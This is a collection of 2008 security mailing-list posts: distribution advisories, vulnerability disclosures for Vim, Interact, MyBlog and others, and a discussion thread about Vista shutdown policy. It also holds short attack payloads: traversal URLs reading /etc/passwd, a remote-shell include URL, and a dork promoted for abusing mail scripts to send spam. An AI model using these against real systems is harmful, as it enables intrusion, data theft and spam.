[ GLSA 200807-11 ] PeerCast: Buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PeerCast: Buffer overflow Date: July 21, 2008 Bugs: #220281 ID: 200807-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer overflow vulnerability in PeerCast may allow for the remote execution of arbitrary code. Background == PeerCast is a client and server for P2P-radio networks. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-sound/peercast < 0.1218-r1>= 0.1218-r1 Description === Nico Golde reported a boundary error in the HTTP::getAuthUserPass() function when processing overly long HTTP Basic authentication requests. Impact == A remote attacker could send a specially crafted HTTP request to the vulnerable server, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All PeerCast users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-sound/peercast-0.1218-r1" References == [ 1 ] CVE-2008-2040 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2040 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIhOkGuhJ+ozIKI5gRAsPLAJ4pDU1p+l+VMNYTV9L3t4EJXpiNywCfQQX2 mm8f+HZSWkiBOofoc2b8tD0= =6L/C -END PGP SIGNATURE-
[ GLSA 200807-10 ] Bacula: Information disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Bacula: Information disclosure Date: July 21, 2008 Bugs: #196834 ID: 200807-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability in Bacula may allow local attackers to obtain sensitive information. Background == Bacula is a network based backup suite. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-backup/bacula < 2.4.1 >= 2.4.1 Description === Matthijs Kooijman reported that the "make_catalog_backup" script uses the MySQL password as a command line argument when invoking other programs. Impact == A local attacker could list the processes on the local machine when the script is running to obtain the MySQL password. Note: The password could also be disclosed via network sniffing attacks when the script fails, in which case it would be sent via cleartext e-mail. Workaround == There is no known workaround at this time. Resolution == A warning about this issue has been added in version 2.4.1, but the issue is still unfixed. We advise not to use the make_catalog_backup script, but to put all MySQL parameters into a dedicated file readable only by the user running Bacula. References == [ 1 ] CVE-2007-5626 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIhNCSuhJ+ozIKI5gRAh0rAJ0ZFhFvvbJqLAnQiCoYaOBoxEszWwCdH7Bz YvVI1E8ezQdFC8viPEVUEvs= =zejn -END PGP SIGNATURE-
E-Mail header Injection in HiFriend
---Header Injection-- Script: hifriend.pl Vendor: Hibyte SoftwareVersion: The free one you get from many webpages Dork: "hifriend.pl" + "cgi-bin" ---Infos--- This Exploit allows you to: * send spam * send fakemails * E-Mail spoofing Whit the google dork, you find a lot of pages using HiFriend. A lot of Servers to send spam with. Modify the source of the Exploit to change the message, your spoofed e-mail, and the receiver. Oh and you can send multiple mails! Just put a comma behind a mail adress. --Exploit--- http://perforin.dark-codez.com/Perl-Scripts/hifriend-xploit.txt -Visit & Greetings www.DarK-CodeZ.com Greetings to all my Friends ;) _ Testen Sie Live.com - die schnelle, personalisierte Homepage, über die Sie auf alle für Sie relevanten Inhalte zentral zugreifen können. http://www.live.com/getstarted
[SECURITY] [DSA 1612-1] New ruby1.8 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1612-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 21, 2008 http://www.debian.org/security/faq - Package: ruby1.8 Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2008-2662 CVE-2008-2663 CVE-2008-2664 CVE-2008-2725 CVE-2008-2726 CVE-2008-2376 Several vulnerabilities have been discovered in the interpreter for the Ruby language, which may lead to denial of service or the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-2662 Drew Yao discovered that multiple integer overflows in the string processing code may lead to denial of service and potentially the execution of arbitrary code. CVE-2008-2663 Drew Yao discovered that multiple integer overflows in the string processing code may lead to denial of service and potentially the execution of arbitrary code. CVE-2008-2664 Drew Yao discovered that a programming error in the string processing code may lead to denial of service and potentially the execution of arbitrary code. CVE-2008-2725 Drew Yao discovered that an integer overflow in the array handling code may lead to denial of service and potentially the execution of arbitrary code. CVE-2008-2726 Drew Yao discovered that an integer overflow in the array handling code may lead to denial of service and potentially the execution of arbitrary code. CVE-2008-2376 It was discovered that an integer overflow in the array handling code may lead to denial of service and potentially the execution of arbitrary code. For the stable distribution (etch), these problems have been fixed in version 1.8.5-4etch2. For the unstable distribution (sid), these problems have been fixed in version 1.8.7.22-2. We recommend that you upgrade your ruby1.8 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Stable updates are available for amd64, arm, hppa, i386, ia64, mipsel, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz Size/MD5 checksum: 4434227 aae9676332fcdd52f66c3d99b289878f http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch2.diff.gz Size/MD5 checksum: 100878 f55f4e2a0ca298d6312a8e3c4618da0f http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch2.dsc Size/MD5 checksum: 1079 02286e0f1885c65a9d1fdad5bd933ac7 Architecture independent packages: http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch2_all.deb Size/MD5 checksum: 309932 0d08bd3d9b467f82df59811dcb4ffd10 http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch2_all.deb Size/MD5 checksum: 209874 76ab42ff282540121b1ffa23b8c34208 http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch2_all.deb Size/MD5 checksum: 235238 d1f242b11d00199ecedf64cac2c6ac44 http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch2_all.deb Size/MD5 checksum: 242330 11359f9774006c02ca68402b1a6c021e http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch2_all.deb Size/MD5 checksum: 1228716 cacd1dfc0b53e163adf3090175d85260 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch2_amd64.deb Size/MD5 checksum: 302500 42fb912eed252ddf0c0e0d1ded838375 http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch2_amd64.deb Size/MD5 checksum: 197696 9388576f466a8d757a261653be326a64 http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch2_amd64.deb Size/MD5 checksum: 198304 6dd9e7ffc83e0a343acc5d9360233724 http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch2_amd64.deb Size/MD5 checksum: 1584450 7bfff8f2effc86fefd21cad2ad7aefe2 http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch2_amd64.deb Size/MD5 checksum: 197264 34559ddb2772bd4e4b4e9438da43b012 http://security.debian.org/pool/updates/main/r/ruby1.8/librub
[White Paper] Abusing HTML 5 Structured Client-side Storage
The aim of this white paper is to analyze security implications of the new HTML 5 client-side storage technology, showing how different attacks can be conduct in order to steal storage data in the client’s machine. Download at: http://trivero.secdiscover.com/html5whitepaper.pdf Greetings, Alberto Trivero
Re: SchoolCenter URL Handling Cross Site Scripting Vulnerability
IS there a patch for this hole?
Flip V3.0 final
### DeltaHackingSecurityTEAM ## ## Remote File Include Vulnerability ## ## Flip V3.0 final ## ## Download : http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/f/fl/flipsource/Flip-3.0-final.zip ### ### ## ## AuTh0r : Cru3l.b0y ## ## H0ME : WwW.DeltaHacking.Net && WwW.w3bsecurity.IR ## ## Email : [EMAIL PROTECTED] ## ## ## Exploit: ## ## www.Target.com/config.php?incpath=[SHELL] ## ### ### SpeciaL GreeTz : :: Dr.Trojan :: All member in DeltaHacking.Net ### ###
Re: Pwnie Awards 2008
Hey Alexandr, I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd be more than happy to - after all one bug over 3 years means someone did a really good job ;) Cheers, David -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402
[DSECRG-08-031] Local File Include Vulnerability in Interact 2.4.1
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-31
Application:Interact E-Learning System
Versions Affected: 2.4.1
Vendor URL: http://sourceforge.net/projects/cce-interact
Bug:Local File Include
Exploits: YES
Reported: 03.07.2008
Vendor response:04.07.2008
Solution: YES
Date of Public Advisory:21.07.2008
Authors:Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Interact E-Learning System system has local file include vulnerability in
script help/help.php
Vulnerable GET parameters "module", "file".
Code
#
$module = isset($_GET['module']) ? $_GET['module']:'';
$file = isset($_GET['file']) ? $_GET['file']:'';
...
$hpath=$CONFIG['BASE_PATH'].'/language/'.$_SESSION['language'].'/help/'.$module.'/'.$file;
if (is_file($hpath)){
require_once($hpath);
} else {
require_once($CONFIG['BASE_PATH'].'/language/default/help/'.$module.'/'.$file);
}
#
Example:
http://[server]/[installdir]/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/help/help.php?file=../../../../../../../../../../../../../etc/passwd
Solution
This file is no longer required by the system. Remove it from installation.
Vendor response:
"I have posted an alert to users to remove this from their installations asap
and will get it removed from the next release of the package."
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 NULL-Pointer reference Denial of Service Vulnerability
FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 NULL-Pointer reference Denial of Service Vulnerability http://www.fortiguardcenter.com/advisory/FGA-2008-16.html July 20, 2008 -- Affected Vendors: EMC -- Affected Products: EMC Dantz Retrospect 7 backup Client 7.5.116 -- Vulnerability Details: There exists vulnerability in EMC's Retrospect Client 7.5.116. which allows remote attackers to cause a Read Access violation, (Client termination and loss of backup service) via malformed packets to TCP port 497, which triggers an assert error. This is a designed error of EMC Dantz: Using a NULL-Pointer reference by mistake. -- Vendor Response: EMC has issued an update to correct this vulnerability: http://www.emcinsignia.com/updates -- Disclosure Timeline: 2008-04-20 - Vulnerability reported to vendor 2008-06-30 - Vendor issued update 2088-07-20 - Coordinated public release of advisory Acknowledgment: Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team Disclaimer: Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing. About Fortinet ( www.fortinet.com ): Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by enterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and unified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions with integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately held and based in Sunnyvale, California.
Vim: Improper Implementation of shellescape()/Arbitrary Code Execution
1. Summary
Product : Vim -- Vi IMproved
Version : >= 7.2a.013; tested with 7.2b
Impact : Arbitrary code execution
Wherefrom: Local, possibly remote
Original : http://www.rdancer.org/vulnerablevim-shellescape.html
http://www.rdancer.org/vulnerablevim-latest.tar.bz2
Improper implementation of the shellescape() function and lack of
documentation can result in untrusted data being insufficiently
sanitized, possibly leading to arbitrary code execution.
2. Background
The shellescape() function, added by patch 7.0.111, has since been
modified in 7.2a.013 to escape special characters, so as to be useful
when sanitizing arguments of the ``execute'' command:
``shellescape({string} [, {special}])
Escape {string} for use as shell command argument.
[...]
When the {special} argument is present and it's a non-zero Number or
a non-empty String [...], then special items such as "%", "#" and
"" will be preceded by a backslash. This backslash will be
removed again by the :! command. Example of use with a :! command:
:exe '!dir ' . shellescape(expand(''), 1)
This results in a directory listing for the file under the cursor.''
-- Vim Reference Manual (``eval.txt'')
3. Vulnerability
shellescape() does not escape all special items. In particular,
shellescape() does not escape the ``!'' character.
The Vim documentation lacks a comprehensive explicit list of special
items. This might have been the reason why patch 7.2a.013 failed to
acknowledge ``!'' as a special item.
3. Test Case
We have added a test case to our test suite; run ``make test'' in the
``shellescape'' directory. The result will show as ``VULNERABLE'' if
the shellescape() function of the version of Vim tested doesn't escape
the ``!'' special item, ``FAILED'' otherwise.
4. Exploit -- Proof of Concept
To show that this vulnerability can be exploited, we have updated our
``tar.vim'' exploit. Run ``make test'' in the ``tarplugin.v2''
directory. Please note that the problem lays within the shellescape()
function implementation, rather than within ``tar.vim''.
5. Test Results
---
Test results below ---
---
Vim version 7.2b
---
tarplugin.v2: VULNERABLE
shellescape: VULNERABLE
(Tests for vulnerabilities that are part of the accompanying test suite
but are not mentioned in this advisory are omitted from this table.)
6. Copyright
This advisory is Copyright 2008 Jan Minar <[EMAIL PROTECTED]>
Copying welcome, under the Creative Commons ``Attribution-Share Alike''
License http://creativecommons.org/licenses/by-sa/2.0/uk/
Code included herein, and accompanying this advisory, may be copied
according to the GNU General Public License version 2, or the Vim
license. See the subdirectory ``licenses''.
Various portions of the accompanying code were written by various
parties. Those parties may hold copyright, and those portions may be
copied according to the respective licenses.
7. History
2008-07-16 Sent to: <[EMAIL PROTECTED]> -- This is the correct address, not
<[EMAIL PROTECTED]>
2008-07-16 Sent to: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>,
<[EMAIL PROTECTED]>,
RE: Windows Vista Power Management & Local Security Policy
I understand all of that, which is precisely the reason I put it out there. The example I put forth might have been a bad one (given that it relies on an additional piece of code to be installed on a target machine), but there's probably more to this issue than I can deduce. I'll let those more versed in that area of security figure it out. As a side note, check out some of the conversations on the Linux Kernel mailing list about power management and security. Interesting stuff. -- Abe Getchell [EMAIL PROTECTED] https://abegetchell.com/ > -Original Message- > From: Jim Harrison [mailto:[EMAIL PROTECTED] > Sent: Sunday, July 20, 2008 4:33 PM > To: '[EMAIL PROTECTED]'; 'Thor (Hammer of God)'; 'Johan Beisser' > Cc: bugtraq@securityfocus.com > Subject: RE: Windows Vista Power Management & Local Security Policy > > It's about reality & priorities. > > What we're both saying is: > 1. it's a bug and should be fixed in accordance with its impact on real > (not imagined) functionality & security > 2. unless this provides some exploit that doesn't start with "if I can > install software on the host", it's not more than "a bug in a security > mechanism" > > If someone can demonstrate an actual vulnerability or exploit on the > basis of this bug _alone_, then they may have something to make noise > about. There are enough real bugs and security vulns in software to > deal with. Not every security issue spells doom and damnation or > warrants immediate corrective response from the vendor. > > Jim > > -Original Message- > From: Abe Getchell [mailto:[EMAIL PROTECTED] > Sent: Sunday, July 20, 2008 12:32 PM > To: 'Thor (Hammer of God)'; Jim Harrison; 'Johan Beisser' > Cc: bugtraq@securityfocus.com > Subject: RE: Windows Vista Power Management & Local Security Policy > > So, you guys don't think it's an issue that power management in Vista > (apparently) has a pass to bypass local security policy? > > -- > Abe Getchell > [EMAIL PROTECTED] > https://abegetchell.com/ > > > -Original Message- > > From: Thor (Hammer of God) [mailto:[EMAIL PROTECTED] > > Sent: Saturday, July 19, 2008 6:20 PM > > To: [EMAIL PROTECTED]; Jim Harrison; bugtraq@securityfocus.com > > Subject: RE: Windows Vista Power Management & Local Security Policy > > > > If Jim is going to get Nancy to run a program, and that's "not all > that > > hard," then why not just have that program do what you want in the > > first > > place rather than worrying about the power switch nonsense? This is > > the > > one million and fourth time: "If your 'vulnerability' begins with > 'if > > I > > can get the user to run code' then whatever comes after the 'then' > > doesn't matter. Period." > > > > t > > > > > > > > > -Original Message- > > > From: Abe Getchell [mailto:[EMAIL PROTECTED] > > > Sent: Saturday, July 19, 2008 12:33 AM > > > To: 'Jim Harrison'; bugtraq@securityfocus.com > > > Subject: RE: Windows Vista Power Management & Local Security Policy > > > > > > As stated in my original e-mail to the list, I definitely don't > think > > > that > > > this is a security vulnerability in a traditional sense. I > completely > > > agree > > > with you. Think about it this way... When you press the power > button > > on > > > the > > > machine and it performs a graceful shutdown, stuff happens inside > of > > > the > > > operating system. That stuff happens at an elevated privilege > level. > > If > > > there were some way to hook into the stuff that happens, you (as an > > > unauthenticated user), could do bad things (besides simply shutting > > > down the > > > system) using that hook simply by pressing the power button at the > > > logon > > > screen. For example, if Jim wants to know what Nancy is working on, > > he > > > could > > > write a program which e-mails him the contents of her "My > Documents" > > > folder > > > that is triggered by a hook into that process. All Jim needs to do > is > > > get > > > Nancy to run that program on her system (not hard) and walk by her > > > office > > > when she's not there and hit the power button (also not hard). So > > what > > > can > > > _I_ do with this bug? Not much, I'm not that great of a > programmer... > > > but I > > > think someone out there could do some nasty stuff. > > > > > > -- > > > Abe Getchell > > > [EMAIL PROTECTED] > > > https://abegetchell.com/ > > > > > > > > > > -Original Message- > > > > From: Jim Harrison [mailto:[EMAIL PROTECTED] > > > > Sent: Saturday, July 19, 2008 1:36 AM > > > > To: '[EMAIL PROTECTED]'; bugtraq@securityfocus.com > > > > Subject: RE: Windows Vista Power Management & Local Security > Policy > > > > > > > > Abe, > > > > > > > > Other than a denial-of-service from the console (is the power > > switch > > > > now a security vuln, too?), what can you do with this bug? It's > > > > absolutely, unquestionably a "bug"; the user should see behavior > as > > > > dictated by logic and described in the documentation, but a > > "security > > >
RE: Windows Vista Power Management & Local Security Policy
It's about reality & priorities. What we're both saying is: 1. it's a bug and should be fixed in accordance with its impact on real (not imagined) functionality & security 2. unless this provides some exploit that doesn't start with "if I can install software on the host", it's not more than "a bug in a security mechanism" If someone can demonstrate an actual vulnerability or exploit on the basis of this bug _alone_, then they may have something to make noise about. There are enough real bugs and security vulns in software to deal with. Not every security issue spells doom and damnation or warrants immediate corrective response from the vendor. Jim -Original Message- From: Abe Getchell [mailto:[EMAIL PROTECTED] Sent: Sunday, July 20, 2008 12:32 PM To: 'Thor (Hammer of God)'; Jim Harrison; 'Johan Beisser' Cc: bugtraq@securityfocus.com Subject: RE: Windows Vista Power Management & Local Security Policy So, you guys don't think it's an issue that power management in Vista (apparently) has a pass to bypass local security policy? -- Abe Getchell [EMAIL PROTECTED] https://abegetchell.com/ > -Original Message- > From: Thor (Hammer of God) [mailto:[EMAIL PROTECTED] > Sent: Saturday, July 19, 2008 6:20 PM > To: [EMAIL PROTECTED]; Jim Harrison; bugtraq@securityfocus.com > Subject: RE: Windows Vista Power Management & Local Security Policy > > If Jim is going to get Nancy to run a program, and that's "not all that > hard," then why not just have that program do what you want in the > first > place rather than worrying about the power switch nonsense? This is > the > one million and fourth time: "If your 'vulnerability' begins with 'if > I > can get the user to run code' then whatever comes after the 'then' > doesn't matter. Period." > > t > > > > > -Original Message- > > From: Abe Getchell [mailto:[EMAIL PROTECTED] > > Sent: Saturday, July 19, 2008 12:33 AM > > To: 'Jim Harrison'; bugtraq@securityfocus.com > > Subject: RE: Windows Vista Power Management & Local Security Policy > > > > As stated in my original e-mail to the list, I definitely don't think > > that > > this is a security vulnerability in a traditional sense. I completely > > agree > > with you. Think about it this way... When you press the power button > on > > the > > machine and it performs a graceful shutdown, stuff happens inside of > > the > > operating system. That stuff happens at an elevated privilege level. > If > > there were some way to hook into the stuff that happens, you (as an > > unauthenticated user), could do bad things (besides simply shutting > > down the > > system) using that hook simply by pressing the power button at the > > logon > > screen. For example, if Jim wants to know what Nancy is working on, > he > > could > > write a program which e-mails him the contents of her "My Documents" > > folder > > that is triggered by a hook into that process. All Jim needs to do is > > get > > Nancy to run that program on her system (not hard) and walk by her > > office > > when she's not there and hit the power button (also not hard). So > what > > can > > _I_ do with this bug? Not much, I'm not that great of a programmer... > > but I > > think someone out there could do some nasty stuff. > > > > -- > > Abe Getchell > > [EMAIL PROTECTED] > > https://abegetchell.com/ > > > > > > > -Original Message- > > > From: Jim Harrison [mailto:[EMAIL PROTECTED] > > > Sent: Saturday, July 19, 2008 1:36 AM > > > To: '[EMAIL PROTECTED]'; bugtraq@securityfocus.com > > > Subject: RE: Windows Vista Power Management & Local Security Policy > > > > > > Abe, > > > > > > Other than a denial-of-service from the console (is the power > switch > > > now a security vuln, too?), what can you do with this bug? It's > > > absolutely, unquestionably a "bug"; the user should see behavior as > > > dictated by logic and described in the documentation, but a > "security > > > vulnerability"? > > > > > > I think that's stretching things juust a bit. > > > > > > Jim > > > > > > -Original Message- > > > From: Abe Getchell [mailto:[EMAIL PROTECTED] > > > Sent: Thursday, July 17, 2008 7:39 PM > > > To: bugtraq@securityfocus.com > > > Subject: Windows Vista Power Management & Local Security Policy > > > > > > When the security option "Shutdown: Allow system to be shutdown > > without > > > having to log on" (in the local security policy) is set to > "Disable", > > > and > > > the power management setting "When I press the power button" is set > > to > > > "Shut > > > Down", it is possible for an unauthenticated user to press the > power > > > button > > > at the Windows logon screen and gracefully shutdown the system. The > > > explanation of this security option, taken from the local security > > > policy, > > > is as follows: > > > > > > "Shutdown: Allow system to be shut down without having to log on > > > > > > This security setting determines whether a computer can be shut > down > > > without > > > having to log
MyBlog <=0.9.8 Multiple Vulnerabilities
## www.BugReport.ir
###
#
# AmnPardaz Security Research Team
#
# Title: MyBlog <=0.9.8 Multiple Vulnerabilities
# Vendor: http://crewdesign.co.uk & http://sourceforge.net/projects/myblog
# Exploit: Available
# Vulnerable Version: 0.9.8
# Impact: High
# Fix: N/A
# Original Advisory: www.bugreport.ir/?/49
###
1. Description:
MyBlog(CMS) is an open source Blog/CMS project. MyBlog(CMS) was
created as an expandable and easy to use system to manage your website
with. Its best feature is its customisability, you could use it to run
your whole site around with forum modules, photo gallery modules and
all that jazz or you could just run a simple add-on blog using it.
2. Vulnerabilities:
2.1. Information Leakage. Database information disclosure in
"/config/mysqlconnection.inc" and/or
"/config/mysqlconnection%20-%20Copy.inc" or "/admin/setup.php".
2.1.1. Exploit:
Check the exploit/POC section.
2.2. Cross Site Scripting (XSS). Reflected XSS attack in "index.php"
in "sort" and "s" parameters.
2.2.1. Exploit:
Check the exploit/POC section.
2.2. Cross Site Scripting (XSS). Reflected XSS attack in "post.php"
in "id" parameter.
2.2.1. Exploit:
Check the exploit/POC section.
2.4. Information Leakage. Source code disclosure in
"/config/settings.inc".
2.4.1. Exploit:
Check the exploit/POC section.
3. Exploits/POCs:
Original Exploit URL: http://bugreport.ir/index.php?/49/exploit
4. Solution:
Edit the source code to ensure that inputs are properly sanitized.
Rename the mentioned files in section 2.1, 2.4 and wait for vendor
patch.
5. Credit:
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
RE: Windows Vista Power Management & Local Security Policy
So, you guys don't think it's an issue that power management in Vista (apparently) has a pass to bypass local security policy? -- Abe Getchell [EMAIL PROTECTED] https://abegetchell.com/ > -Original Message- > From: Thor (Hammer of God) [mailto:[EMAIL PROTECTED] > Sent: Saturday, July 19, 2008 6:20 PM > To: [EMAIL PROTECTED]; Jim Harrison; bugtraq@securityfocus.com > Subject: RE: Windows Vista Power Management & Local Security Policy > > If Jim is going to get Nancy to run a program, and that's "not all that > hard," then why not just have that program do what you want in the > first > place rather than worrying about the power switch nonsense? This is > the > one million and fourth time: "If your 'vulnerability' begins with 'if > I > can get the user to run code' then whatever comes after the 'then' > doesn't matter. Period." > > t > > > > > -Original Message- > > From: Abe Getchell [mailto:[EMAIL PROTECTED] > > Sent: Saturday, July 19, 2008 12:33 AM > > To: 'Jim Harrison'; bugtraq@securityfocus.com > > Subject: RE: Windows Vista Power Management & Local Security Policy > > > > As stated in my original e-mail to the list, I definitely don't think > > that > > this is a security vulnerability in a traditional sense. I completely > > agree > > with you. Think about it this way... When you press the power button > on > > the > > machine and it performs a graceful shutdown, stuff happens inside of > > the > > operating system. That stuff happens at an elevated privilege level. > If > > there were some way to hook into the stuff that happens, you (as an > > unauthenticated user), could do bad things (besides simply shutting > > down the > > system) using that hook simply by pressing the power button at the > > logon > > screen. For example, if Jim wants to know what Nancy is working on, > he > > could > > write a program which e-mails him the contents of her "My Documents" > > folder > > that is triggered by a hook into that process. All Jim needs to do is > > get > > Nancy to run that program on her system (not hard) and walk by her > > office > > when she's not there and hit the power button (also not hard). So > what > > can > > _I_ do with this bug? Not much, I'm not that great of a programmer... > > but I > > think someone out there could do some nasty stuff. > > > > -- > > Abe Getchell > > [EMAIL PROTECTED] > > https://abegetchell.com/ > > > > > > > -Original Message- > > > From: Jim Harrison [mailto:[EMAIL PROTECTED] > > > Sent: Saturday, July 19, 2008 1:36 AM > > > To: '[EMAIL PROTECTED]'; bugtraq@securityfocus.com > > > Subject: RE: Windows Vista Power Management & Local Security Policy > > > > > > Abe, > > > > > > Other than a denial-of-service from the console (is the power > switch > > > now a security vuln, too?), what can you do with this bug? It's > > > absolutely, unquestionably a "bug"; the user should see behavior as > > > dictated by logic and described in the documentation, but a > "security > > > vulnerability"? > > > > > > I think that's stretching things juust a bit. > > > > > > Jim > > > > > > -Original Message- > > > From: Abe Getchell [mailto:[EMAIL PROTECTED] > > > Sent: Thursday, July 17, 2008 7:39 PM > > > To: bugtraq@securityfocus.com > > > Subject: Windows Vista Power Management & Local Security Policy > > > > > > When the security option "Shutdown: Allow system to be shutdown > > without > > > having to log on" (in the local security policy) is set to > "Disable", > > > and > > > the power management setting "When I press the power button" is set > > to > > > "Shut > > > Down", it is possible for an unauthenticated user to press the > power > > > button > > > at the Windows logon screen and gracefully shutdown the system. The > > > explanation of this security option, taken from the local security > > > policy, > > > is as follows: > > > > > > "Shutdown: Allow system to be shut down without having to log on > > > > > > This security setting determines whether a computer can be shut > down > > > without > > > having to log on to Windows. > > > > > > When this policy is enabled, the Shut Down command is available on > > the > > > Windows logon screen. > > > > > > When this policy is disabled, the option to shut down the computer > > does > > > not > > > appear on the Windows logon screen. In this case, *users must be > able > > > to log > > > on to the computer successfully and have the Shut down the system > > user > > > right > > > before they can perform a system shutdown*. > > > > > > Default on workstations: Enabled. > > > Default on servers: Disabled." > > > > > > Note the text between the asterisks. While this bug isn't > necessarily > > a > > > software flaw allowing for an intrusion into the system in a > > > traditional > > > sense, it does set a bad precedence in that power management has a > > free > > > pass > > > to bypass local security policy and perform actions expressly > against > > > the > > > defined policy. It app
EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability
